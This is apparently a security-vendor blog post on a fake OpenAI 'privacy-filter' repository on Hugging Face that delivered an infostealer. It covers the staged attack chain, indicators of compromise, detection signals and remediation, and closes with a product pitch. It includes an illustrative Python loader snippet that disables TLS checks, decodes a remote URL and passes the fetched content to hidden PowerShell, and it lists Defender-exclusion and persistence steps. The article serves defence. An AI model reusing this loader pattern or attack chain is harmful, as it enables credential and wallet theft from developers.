AI Security

The Fake OpenAI 'privacy-filter' Model: How a Typosquat Hit #1 on Hugging Face in May 2026

A repository named Open-OSS/privacy-filter impersonated OpenAI's release, copied its model card verbatim, and shipped a loader.py that pulled an infostealer. It reached #1 trending with ~244,000 downloads before removal.

In early May 2026, a Hugging Face repository named Open-OSS/privacy-filter climbed to the #1 trending spot on the platform within roughly 18 hours, accumulating about 244,000 reported downloads before it was removed. It was a fake. The repository typosquatted OpenAI's legitimate openai/privacy-filter release from April 2026, copied the model card nearly verbatim, and shipped a loader.py file that fetched and executed an infostealer on Windows machines. HiddenLayer's research team, which identified and reported the campaign on May 7, 2026, tied it to a cluster of six related repositories and an overlapping npm typosquatting operation.

The incident is a clean illustration of a problem the AI supply chain has been circling for two years: a model repository is not just data, it is executable code with a trust signal attached. The trust signal here was a familiar publisher name, a polished model card, a trending badge, and a six-figure download count. Every one of those signals was either spoofed or inflated. A developer pulling what they believed was OpenAI's privacy filter got a credential stealer instead.

What makes this case worth dissecting is not the malware sophistication, which was modest, but how effectively the attacker exploited the social and ranking mechanics of a model hub. The download count and likes were almost certainly inflated by automated accounts, which pushed the repository to the top of trending, which lent it credibility, which drove real downloads. The supply chain attack and the reputation attack were the same attack.

TL;DR

Open-OSS/privacy-filter typosquatted OpenAI's openai/privacy-filter (released April 2026), copying the model card nearly verbatim.
It shipped a loader.py that disabled SSL verification, decoded a Base64 URL hosted on JSON Keeper, and passed a command to PowerShell, which fetched a batch script from api.eth-fastscan[.]org.
The batch stage elevated via UAC, added Microsoft Defender exclusions, scheduled a task for persistence, and downloaded a final-stage infostealer that harvested browser data, crypto wallets, FileZilla configs, screenshots, and system metadata. Exfiltration went to recargapopular[.]com.
The repo reached #1 trending in about 18 hours with roughly 244,000 downloads and 667 likes. HiddenLayer assessed those numbers as likely artificially inflated by automated accounts.
HiddenLayer found six related repositories under the anthfu namespace using identical loaders, and an IOC overlap (welovechinatown[.]info) with an npm package (trevlo) delivering ValleyRAT / Winos 4.0.
Disclosed by HiddenLayer on May 7, 2026; covered by The Hacker News and BleepingComputer in mid-May 2026.

What happened

According to HiddenLayer's research, the malicious repository impersonated OpenAI's privacy-filter model, which OpenAI had released in April 2026. The fake repo, Open-OSS/privacy-filter, copied the legitimate model card almost word for word, which is what let it pass a casual human review: the README looked exactly like the real thing.

The repository did not just contain weights. It contained a loader.py script positioned as setup or inference code, the kind of file a user is likely to run to "use" the model. That file was the entry point for the infection chain.

The repository reached #1 on Hugging Face's trending list within about 18 hours and showed roughly 244,000 downloads and 667 likes. HiddenLayer noted that the vast majority of the accounts that liked the repository appeared to be auto-generated and that the download figure was likely artificially inflated. The inflation was not incidental. It manufactured the social proof that pushed the repository onto the trending list, where it harvested genuine downloads from developers who trusted the ranking.

HiddenLayer identified six additional repositories under the anthfu namespace using identical Python loaders, including names crafted to look like plausible model releases (for example GGUF-formatted variants of well-known model families). The firm also reported an IOC overlap with an npm package named trevlo (published April 4, 2026) that delivered ValleyRAT / Winos 4.0, sharing the welovechinatown[.]info domain. That overlap suggests the model-hub campaign was one arm of a broader operation targeting open-source ecosystems.

How the attack worked

The infection chain was multi-stage, with each stage adding evasion and persistence. The following is a defensive reconstruction from HiddenLayer's and The Hacker News' reporting. It is descriptive, not a runnable exploit.

Stage 1, the loader. The loader.py script, disguised as model setup code, disabled SSL certificate verification, decoded a Base64-encoded URL hosted on JSON Keeper, and used it to retrieve a command that was passed to PowerShell for execution. Disabling SSL verification is a tell: legitimate model loading code has no reason to do it.

# Illustrative shape of the malicious loader stage. NOT functional exploit code.
# Red flags: disabled TLS verification, base64-decoded remote URL,
# remote content handed to a shell.

import base64, ssl, urllib.request, subprocess

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE            # red flag #1

url = base64.b64decode("<encoded-jsonkeeper-url>").decode()  # red flag #2
cmd = urllib.request.urlopen(url, context=ctx).read().decode()
subprocess.run(["powershell", "-WindowStyle", "Hidden", cmd])  # red flag #3

Stage 2, the batch downloader. PowerShell fetched a batch script from api.eth-fastscan[.]org. That script elevated privileges via a UAC bypass, configured Microsoft Defender exclusions to keep the next stage from being scanned, downloaded the next-stage binary, and scheduled a task for persistence.

Stage 3, the infostealer. The final payload harvested screenshots, cryptocurrency wallets and wallet browser extensions, wallet seed phrases, system metadata, FileZilla configuration files, and credentials from Chromium- and Gecko-based browsers. Stolen data was exfiltrated to recargapopular[.]com.

The notable design choice across all stages is the reliance on legitimate-looking infrastructure (JSON Keeper as a paste-style URL host, Hugging Face itself as the distribution channel) so that the only obviously suspicious artifact is the loader.py behavior. A user who never reads the loader sees only a trending OpenAI model.

What detection looks like

For an organization that pulls models from Hugging Face, the detectable signals fall into two buckets: repository-level and endpoint-level.

Repository and supply-chain signals:

Publisher namespace mismatch. The real release is openai/privacy-filter; the malicious one is Open-OSS/privacy-filter. Any model card that claims to be from a major lab but lives under a different org namespace is a hard signal. Verbatim model-card copying with a different owner is a typosquat fingerprint.
Executable Python in a "model" repo. A loader.py or setup script that performs network fetches, decodes obfuscated URLs, or spawns shells has no business in a weights distribution. Treat any .py that calls subprocess, os.system, eval, or disables TLS as malicious by default.
Anomalous trending velocity. A brand-new repository that reaches #1 trending in under a day, with likes overwhelmingly from accounts created in a tight window, is a manufactured-reputation pattern.
Known IOCs from this campaign. Domains api.eth-fastscan[.]org, recargapopular[.]com, and welovechinatown[.]info; the anthfu namespace; npm package trevlo.

Endpoint signals (if a developer already ran the loader):

Python or model tooling spawning powershell.exe with a hidden window.
New Microsoft Defender exclusion entries created by a non-admin-initiated process.
New scheduled tasks created shortly after a pip/model-download workflow.
Outbound connections to the IOC domains above, or to JSON Keeper from a Python process.

What to do Monday morning

Search your environment for the IOCs. Hunt for the domains api.eth-fastscan[.]org, recargapopular[.]com, and welovechinatown[.]info in DNS and proxy logs, and for any local clone or download of Open-OSS/privacy-filter or the anthfu repositories. Treat hits as a compromised-credential incident: rotate browser-stored credentials, crypto wallets, and any secrets that were on affected machines.
Block executable code paths in model ingestion. Add a gate that refuses to import any model repository containing .py files that spawn shells, decode remote URLs, or disable TLS verification. For most production use you only need the weights, the tokenizer, and the config.
Pin to verified publishers and exact commits. Pull models only from verified org namespaces, and pin to a specific commit SHA, not a moving branch. Confirm the publisher namespace matches the lab you intend (openai/..., not a look-alike org).
Stop trusting trending and download counts as a security signal. They are gameable and were gamed here. Ranking is a discovery aid, not a provenance guarantee.
Prefer safetensors and load in isolation. Where possible, restrict ingestion to safetensors artifacts and run any first-time load in a sandboxed environment with no credential access and egress monitoring.
Scan models before they touch a developer machine. Run a model scanner over downloaded repositories and gate on the result, the same way you would scan an npm or PyPI package before install.

Why this keeps happening

Model hubs inherited the worst property of package registries (arbitrary code distributed under a name-based trust model) without the decade of hard-won registry defenses that came with it. On PyPI and npm, typosquatting, install-time code execution, and reputation gaming are well-understood threats with mature, if imperfect, countermeasures. On model hubs, the same threats arrived faster than the defenses.

Three structural factors make it worse. First, model repositories routinely ship loader and inference scripts, so executable code is normal rather than suspicious, unlike a data-only artifact. Second, the discovery surface (trending, likes, downloads) is socially gameable and is treated by users as a credibility signal. Third, the trust anchor is a string. openai and Open-OSS are one namespace apart, and a verbatim model card erases the visual difference for a hurried developer. The same dynamics that made dependency confusion and typosquatting effective on npm map directly onto model hubs.

The structural fix

The realistic defensive goal is to cut the time between "a malicious model appears" and "it is blocked in your environment," and to shrink what a single bad pull can reach. Safeguard treats Hugging Face models as first-class supply-chain components in the AI-BOM, inventorying every model your applications load and linking it to its repository, publisher namespace, and commit SHA. The malicious-package and quarantine feeds that power typosquatting defense extend to model hubs, so a name like Open-OSS/privacy-filter masquerading as openai/privacy-filter surfaces as a finding rather than passing as a trending model. Policy enforcement can require verified publishers, commit-SHA pinning, and safetensors-only loads, and can refuse repositories that ship shell-spawning loader scripts. That would not have stopped the upload, but it shortens dwell time and reduces blast radius, which is the achievable outcome for a registry you do not control. The same engine behind SCA applies the package-security discipline to models.

What we know we don't know

The 244,000 download figure is HiddenLayer's reported number with an explicit caveat that it was likely inflated by automated accounts; the count of genuine victim downloads is not public.
The exact attribution is unconfirmed. The IOC overlap with the trevlo / ValleyRAT (Winos 4.0) campaign suggests a possible link, but HiddenLayer frames it as "possibly linked," not confirmed common ownership.
The full victim impact (how many developers ran loader.py versus merely downloaded the repo) is not reported.
Whether the anthfu namespace repositories accrued their own victims before removal is not detailed in the public coverage.

References

huggingface ml-supply-chain typosquatting malicious-model infostealer loader-py model-hub-security

Back to all articles

More on #huggingface

View all

AI Security

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.

The Fake OpenAI 'privacy-filter' Model: How a Typosquat Hit #1 on Hugging Face in May 2026

TL;DR

What happened

How the attack worked

What detection looks like

What to do Monday morning

Why this keeps happening

The structural fix

What we know we don't know

References

More on #huggingface

Securing Hugging Face Models: A Practical Safety Guide

Hugging Face as Malware CDN and Exfiltration Backend: The DPRK-Linked npm Campaign of May 2026

Hugging Face Model Hub Supply Chain Risks in 2025

Hugging Face's Guardian-Plus-Picklescan Stack: How the Model Hub Scanning Posture Evolved Through 2025-2026

Related articles in AI Security

The Cursor extension that cost a developer $500,000

When the Scanner Is the Backdoor: The LiteLLM Trivy Attack

The Nx Attack Turned AI Coding Agents Into the Malware

Never miss an update